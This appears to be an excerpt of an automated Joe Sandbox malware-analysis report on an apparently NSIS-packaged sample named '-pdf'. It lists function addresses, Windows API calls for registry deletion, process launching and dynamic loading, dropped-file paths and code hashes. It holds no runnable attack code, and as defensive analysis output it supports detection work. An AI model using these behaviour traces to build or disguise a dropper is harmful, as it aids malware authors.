                                                                                                                                                Similarity
                                                                                                                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4216380887-0
                                                                                                                                                • Opcode ID: f2663167137b5543e08fe6b95dc4d574a180336b54ff1969f84397f02827bc98
                                                                                                                                                • Instruction ID: 2d62d1348b2bab1acca3ffb136248a1ff23880f0f085ee74bd2d8fce56845ec3
                                                                                                                                                • Opcode Fuzzy Hash: f2663167137b5543e08fe6b95dc4d574a180336b54ff1969f84397f02827bc98
                                                                                                                                                • Instruction Fuzzy Hash: 8041BE71405A06EFC319DF65C844AEDB7BCFB0D340B51423EFA499B149E77065E1DAA0
                                                                                                                                                Function 0040141E Relevance: 7.6, APIs: 5, Instructions: 82registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00401486
                                                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014D2
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004014DC
                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 004014FB
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00401507
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseEnum$DeleteValue
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1354259210-0
                                                                                                                                                • Opcode ID: e8ddf1ba41867b4dcb0a1b51ee85c4361d4a4490657ba90a650c7ccd87fbe96b
                                                                                                                                                • Instruction ID: 1a53fb46a82155f82ff31744ef364dfb58a0b08b91411c266ca9c6ebac2befae
                                                                                                                                                • Opcode Fuzzy Hash: e8ddf1ba41867b4dcb0a1b51ee85c4361d4a4490657ba90a650c7ccd87fbe96b
                                                                                                                                                • Instruction Fuzzy Hash: 98218032108244BBD7219F51DD08FABBBADEF99354F02043EF989A11B0D7359A149A6A
                                                                                                                                                Function 00401EFE Relevance: 7.6, APIs: 5, Instructions: 58windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00401F03
                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00401F4D
                                                                                                                                                • LoadImageW.USER32(00000000,?,?,?,?,?), ref: 00401F82
                                                                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401F92
                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401FA1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                                • Opcode ID: 98f75aba006c6a5594cee4be0e94aef13d4a7b31b35136db1a8977114ed6425a
                                                                                                                                                • Instruction ID: 6bda43a873e8b32b4ce9570560c6ff4fe1bc8a6da0a84cdd7e64f144b00f1dd0
                                                                                                                                                • Opcode Fuzzy Hash: 98f75aba006c6a5594cee4be0e94aef13d4a7b31b35136db1a8977114ed6425a
                                                                                                                                                • Instruction Fuzzy Hash: 87118F72609702AFD340DB64CE84A6B7BE9EB88344F04093DB985E62A1C678DD408B59
                                                                                                                                                Function 00401FB8 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetDC.USER32 ref: 00401FB9
                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401FD0
                                                                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401FD8
                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401FEB
                                                                                                                                                  • Part of subcall function 00405FBD: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,?,?,?,?,?,?,?,?,?,?,?,00403466), ref: 0040618F
                                                                                                                                                • CreateFontIndirectW.GDI32(0040C8E8), ref: 00402037
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CapsCreateDeviceFontIndirectReleaselstrcat
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4253744674-0
                                                                                                                                                • Opcode ID: a2cb6d5a530958616e1a68da60b4d574b0b9919d37be39f7b238e4b07ad129ff
                                                                                                                                                • Instruction ID: 3db98f0040f9558d3034a6f543d99371bd15d147d3a645f57d18814a747c8483
                                                                                                                                                • Opcode Fuzzy Hash: a2cb6d5a530958616e1a68da60b4d574b0b9919d37be39f7b238e4b07ad129ff
                                                                                                                                                • Instruction Fuzzy Hash: DA01D472104341EFD300BBB49E4AF5A3BE8E755706F10893DF690B71E1CA784106AB2E
                                                                                                                                                Function 70311F7B Relevance: 7.5, APIs: 5, Instructions: 38memorylibraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000808,00000000,70312B4C,00000000,00000808), ref: 70311F8C
                                                                                                                                                • GlobalAlloc.KERNEL32(?,00000000), ref: 70311F97
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 70311FAB
                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 70311FB6
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 70311FBF
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37968691201.0000000070311000.00000020.00000001.01000000.00000005.sdmp, Offset: 70310000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37968666099.0000000070310000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37968717841.0000000070314000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37968741619.0000000070316000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_70310000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1148316912-0
                                                                                                                                                • Opcode ID: e534ebf69ea0fc5fdbfea2da16e3cd6ac3f3b1a6b0ff44314a5cc229a5378a81
                                                                                                                                                • Instruction ID: 34f08f1283cbac5b4a38f5a50fe40edba8ba33dc960722be78271ba43b8d8df7
                                                                                                                                                • Opcode Fuzzy Hash: e534ebf69ea0fc5fdbfea2da16e3cd6ac3f3b1a6b0ff44314a5cc229a5378a81
                                                                                                                                                • Instruction Fuzzy Hash: D0F0AC33108518BFD6101BE7DC0CE57BE6CEB8F6FAB264215F719D21A0E5A268008771
                                                                                                                                                Function 00405663 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • lstrlenW.KERNEL32(00421200,%u.%u%s%s,?,00000000,00000000,?,?,00000000,?,000000DF,00421200,?,?,?,?,?), ref: 00405722
                                                                                                                                                • wsprintfW.USER32 ref: 0040572F
                                                                                                                                                • SetDlgItemTextW.USER32(?,00421200), ref: 00405746
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                • String ID: %u.%u%s%s
                                                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                                                • Opcode ID: c96249e9300986abb23fa76973b5aeafd7c2cead55943fec95e169e365224207
                                                                                                                                                • Instruction ID: 16b5fc0e536004003feacbc0b07359baea7c85987217a9a7f81b4acd8141d083
                                                                                                                                                • Opcode Fuzzy Hash: c96249e9300986abb23fa76973b5aeafd7c2cead55943fec95e169e365224207
                                                                                                                                                • Instruction Fuzzy Hash: 342106337046145BE720A9799C40FABB289C7C1364F114B3EFD6AF31D1E97A4C0885A5
                                                                                                                                                Function 00401DBA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,?,?,?), ref: 00401E2C
                                                                                                                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00401E48
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                                • String ID: !
                                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                                • Opcode ID: 4ac29c9cce96a64425d433324c190f698a606156d2abb8f580e7760b9a936131
                                                                                                                                                • Instruction ID: 69e66636fd5bd3b5647f571c9a221c10a7108a79841ed4504f027ee0874c03e8
                                                                                                                                                • Opcode Fuzzy Hash: 4ac29c9cce96a64425d433324c190f698a606156d2abb8f580e7760b9a936131
                                                                                                                                                • Instruction Fuzzy Hash: B821F471609301AFE714AF21C846A2FBBE8EF84755F00093FF585A61E0D6B99D05CA9A
                                                                                                                                                Function 70311F1E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • wsprintfW.USER32 ref: 70311F51
                                                                                                                                                • lstrcpyW.KERNEL32(?,error,00001018,70311765,00000000,?), ref: 70311F71
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37968691201.0000000070311000.00000020.00000001.01000000.00000005.sdmp, Offset: 70310000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37968666099.0000000070310000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37968717841.0000000070314000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37968741619.0000000070316000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_70310000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: lstrcpywsprintf
                                                                                                                                                • String ID: callback%d$error
                                                                                                                                                • API String ID: 2408954437-1307476583
                                                                                                                                                • Opcode ID: 8ce045023cbefb1c0197c62203c730c844d83a22c0abcc284fd0e1c9e866e32f
                                                                                                                                                • Instruction ID: 8e2d22c73b0b1be560706a40f6070e99b4c90b83c66fc6c8f7ba08f8f435b796
                                                                                                                                                • Opcode Fuzzy Hash: 8ce045023cbefb1c0197c62203c730c844d83a22c0abcc284fd0e1c9e866e32f
                                                                                                                                                • Instruction Fuzzy Hash: 16F08235204911AFE3088B05D948EFEB3A9EF8D310F1682ACFE4A87311D7B0EC819B51
                                                                                                                                                Function 0040666B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403DC6,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,776A3420,00403ACC), ref: 00406671
                                                                                                                                                • CharPrevW.USER32(?,00000000), ref: 0040667C
                                                                                                                                                • lstrcatW.KERNEL32(?,004082B0), ref: 0040668E
                                                                                                                                                Strings
                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040666B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                • API String ID: 2659869361-3355392842
                                                                                                                                                • Opcode ID: af0f29ec3e00eb9cb7465e170f069c3d07ca18caf44beac98ff2055d579f65ee
                                                                                                                                                • Instruction ID: e53bcaeb2a9d501c079122a7a30c9a72ba2c4e071b5cbc1f188cd12783ca4c41
                                                                                                                                                • Opcode Fuzzy Hash: af0f29ec3e00eb9cb7465e170f069c3d07ca18caf44beac98ff2055d579f65ee
                                                                                                                                                • Instruction Fuzzy Hash: A4D01731102A24EBC2025B549E0899B76ACAF46301305446AF982A2160CB78295287FD
                                                                                                                                                Function 0040285F Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 70stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsq66FB.tmp\System.dll), ref: 004028B9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: lstrlen
                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsq66FB.tmp$C:\Users\user\AppData\Local\Temp\nsq66FB.tmp\System.dll
                                                                                                                                                • API String ID: 1659193697-976638190
                                                                                                                                                • Opcode ID: 387afe5f2ee94bb6b8344b757808788b15e5643010adbc636527a30c9f2b8f3a
                                                                                                                                                • Instruction ID: b2a1b44c32654855d82a94df603f8ab0089ff69422b0f6d19ee8e4250137a66d
                                                                                                                                                • Opcode Fuzzy Hash: 387afe5f2ee94bb6b8344b757808788b15e5643010adbc636527a30c9f2b8f3a
                                                                                                                                                • Instruction Fuzzy Hash: C6110676A4431167C314EB619D8592FB7D4AF84314F55843FF545B21C1D7BC980683AF
                                                                                                                                                Function 00401EF3 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00401F4D
                                                                                                                                                • LoadImageW.USER32(00000000,?,?,?,?,?), ref: 00401F82
                                                                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401F92
                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401FA1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ClientDeleteImageLoadMessageObjectRectSend
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1043200266-0
                                                                                                                                                • Opcode ID: 686a7abe3f8a013adc7e11b1606469f3bcc95bbbd77d7f041d4b1c04e2df71ff
                                                                                                                                                • Instruction ID: 2225aee0815daf28cf8e16459153004223371172b210a9e7ab77f590dea0d4fa
                                                                                                                                                • Opcode Fuzzy Hash: 686a7abe3f8a013adc7e11b1606469f3bcc95bbbd77d7f041d4b1c04e2df71ff
                                                                                                                                                • Instruction Fuzzy Hash: 0521D2726093029FD310DF65DD84A6BB7E8EB88345F04093EF985E62A1D67CDD40CB59
                                                                                                                                                Function 00402077 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 54COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00405E3D: lstrlenW.KERNEL32(00424230,C:\Users\user\Desktop,00000000,00000000), ref: 00405E6F
                                                                                                                                                  • Part of subcall function 00405E3D: lstrlenW.KERNEL32(?,00424230,C:\Users\user\Desktop,00000000,00000000), ref: 00405E81
                                                                                                                                                  • Part of subcall function 00405E3D: lstrcatW.KERNEL32(00424230,?,?,00424230,C:\Users\user\Desktop,00000000,00000000), ref: 00405E9C
                                                                                                                                                  • Part of subcall function 00405E3D: SetWindowTextW.USER32(00424230,00424230), ref: 00405EB4
                                                                                                                                                  • Part of subcall function 00405E3D: SendMessageW.USER32(?), ref: 00405EDB
                                                                                                                                                  • Part of subcall function 00405E3D: SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405EF6
                                                                                                                                                  • Part of subcall function 00405E3D: SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405F03
                                                                                                                                                  • Part of subcall function 00406B08: ShellExecuteExW.SHELL32(?), ref: 00406B17
                                                                                                                                                  • Part of subcall function 00406629: WaitForSingleObject.KERNEL32(?,?), ref: 00406633
                                                                                                                                                  • Part of subcall function 00406629: GetExitCodeProcess.KERNEL32(?,?), ref: 0040665D
                                                                                                                                                • CloseHandle.KERNEL32(?,?), ref: 00402110
                                                                                                                                                Strings
                                                                                                                                                • C:\Users\user\AppData\Local\Anvilled, xrefs: 004020D1
                                                                                                                                                • @, xrefs: 004020F2
                                                                                                                                                • C:\Users\user\AppData\Local\Temp\nsq66FB.tmp\System.dll, xrefs: 00402098
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
